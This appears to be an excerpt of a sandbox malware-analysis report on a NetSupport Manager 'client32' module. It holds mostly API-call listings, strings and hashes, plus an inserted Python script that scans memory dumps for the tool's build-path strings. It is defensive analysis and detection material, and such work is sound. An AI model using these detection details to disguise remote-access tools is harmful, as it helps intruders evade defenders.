                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread__wcstoi64
                                                                                                                                                    • String ID: *TapiFixPeriod$Bridge
                                                                                                                                                    • API String ID: 1152747075-2058455932
                                                                                                                                                    • Opcode ID: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                                                                                    • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                                                                                                    • Opcode Fuzzy Hash: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                                                                                    • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback), ref: 6CA84D94
                                                                                                                                                    • SetLastError.KERNEL32(00000078,03822B3C,?,6CA8B267,00000000,6CA86BD0), ref: 6CA84DB5
                                                                                                                                                    Strings
                                                                                                                                                    • InternetSetStatusCallback, xrefs: 6CA84D8E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetSetStatusCallback
                                                                                                                                                    • API String ID: 199729137-894424467
                                                                                                                                                    • Opcode ID: 3631d4f3a1b096ea6213b4b69cf8001f9617a2ed42a1389c1affe8bba77f7866
                                                                                                                                                    • Instruction ID: 7c8ba7b287de36736435a8bcfa994d2cac32887cb3a709785ca3488dca44ca18
                                                                                                                                                    • Opcode Fuzzy Hash: 3631d4f3a1b096ea6213b4b69cf8001f9617a2ed42a1389c1affe8bba77f7866
                                                                                                                                                    • Instruction Fuzzy Hash: 29E06572A457246FC7209F99D848A57B7F8FB44725F05851AE985D7600D671E880CBD0
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA84C44
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,6CA8B677,?), ref: 6CA84C61
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetCloseHandle
                                                                                                                                                    • API String ID: 199729137-3843628324
                                                                                                                                                    • Opcode ID: ac8631c01c00439480b800eb10de310ef2c7e2e2b8c126a09ad36162a5e9edc9
                                                                                                                                                    • Instruction ID: 51cb9600f7b4af2eb9f583881f20cfcf3429fd4763886ec55d66e11f7080a5e9
                                                                                                                                                    • Opcode Fuzzy Hash: ac8631c01c00439480b800eb10de310ef2c7e2e2b8c126a09ad36162a5e9edc9
                                                                                                                                                    • Instruction Fuzzy Hash: BCE092B2A057249FC3249FA59804A46B7FCBB24725F05462AE545D7901C670E8848BE0
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: FlashWindowEx
                                                                                                                                                    • API String ID: 199729137-2859592226
                                                                                                                                                    • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                                                    • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                                                                                    • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                                                    • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                                                                                    APIs
                                                                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110010A6
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 2046328329-2830328467
                                                                                                                                                    • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                                                    • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                                                                                    • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                                                    • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 11001066
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 819365019-2830328467
                                                                                                                                                    • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                                                    • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                                                                                    • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                                                    • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110010F6
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 906220102-2830328467
                                                                                                                                                    • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                                                    • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                                                                                    • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                                                    • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110151B6
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                                    • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                                                    • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                                                                                    • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                                                    • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
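The listings above share one shape: a small wrapper around SendMessageA, SendDlgItemMessageA or PostMessageA that references the expression string m_hWnd and a source path under e:\nsmsrc\nsm\1210\1210f\ctl32\ (wndclass.h, listview.h), and reaches, via subcall 11029A70, a routine that formats GetLastError with wsprintfA, shows a MessageBoxA captioned Client32 and calls ExitProcess. That combination of file path, expression text and fatal message box is what an assertion macro leaves behind, and the paths are build artifacts of the NetSupport Manager client (the snapshot is named client32). The Python below is an added example, not part of the Joe Sandbox report or of NetSupport's code: it scans a dump for those strings and summarises the build version and header files it finds. The regex assumes every assertion path in the build follows the same ctl32 layout as the two seen here, which is my generalisation, and the sample buffer is constructed for the example.

```python
"""Scan a memory dump or PE image for NetSupport Manager client32 build
artifacts: assertion source paths under e:\\nsmsrc\\nsm\\...\\ctl32\\ and the
"Client32" MessageBoxA caption. Added example; not from the report or from
NetSupport. Runs offline on the constructed SAMPLE below."""
import re
from dataclasses import dataclass

# Assumption (mine): every assertion path in this build looks like the two
# seen in the listing (wndclass.h, listview.h), so one pattern covers them all.
# Groups: 1 = major version digits, 2 = build tag (e.g. 1210f), 3 = header file.
NSM_PATH_RE = re.compile(
    rb"e:\\nsmsrc\\nsm\\(\d+)\\(\w+)\\ctl32\\([A-Za-z0-9_]+\.h)", re.IGNORECASE
)
# NUL-terminated caption passed to MessageBoxA by the handler at 11029A70.
CAPTION = b"Client32\x00"


@dataclass(frozen=True)
class Hit:
    offset: int
    kind: str     # "assert_path" or "caption"
    detail: str   # the matched string, decoded


def scan(buf: bytes) -> list[Hit]:
    """Return every assertion-path and caption hit in buf, ordered by offset."""
    hits = [Hit(m.start(), "assert_path", m.group(0).decode("ascii"))
            for m in NSM_PATH_RE.finditer(buf)]
    start = 0
    while (i := buf.find(CAPTION, start)) != -1:
        hits.append(Hit(i, "caption", "Client32"))
        start = i + 1
    return sorted(hits, key=lambda h: h.offset)


def summarize(hits: list[Hit]) -> dict:
    """Collapse hits into build version(s), distinct headers and caption count."""
    versions, headers, captions = set(), set(), 0
    for h in hits:
        if h.kind == "assert_path":
            m = NSM_PATH_RE.match(h.detail.encode("ascii"))
            versions.add(m.group(1).decode())
            headers.add(m.group(3).decode().lower())
        else:
            captions += 1
    return {"versions": sorted(versions),
            "headers": sorted(headers),
            "caption_hits": captions}


# Constructed sample: two assertion paths, the m_hWnd expression string,
# padding bytes and one caption, laid out as a read-only data section might be.
SAMPLE = (
    b"\x00" * 16
    + b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\wndclass.h\x00"
    + b"m_hWnd\x00"
    + b"\x90" * 8
    + CAPTION
    + b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\listview.h\x00"
)


if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"{h.offset:#010x}  {h.kind:12}  {h.detail}")
    print(summarize(scan(SAMPLE)))
```

A hit on these strings identifies a build of the NetSupport Manager client, which is a commercial remote-control product; on its own that is an identification, not a verdict. Pair it with the delivery chain and the process that loaded the module before treating the sample as a RAT deployment rather than an administrator's install.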
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 11017206
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                                    • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                                                    • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                                                                                    • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                                                    • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
APIs
• ShowWindow.USER32(?,?), ref: 1100114B
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 11001136
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcessShowWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 1604732272-2830328467
• Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
• Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
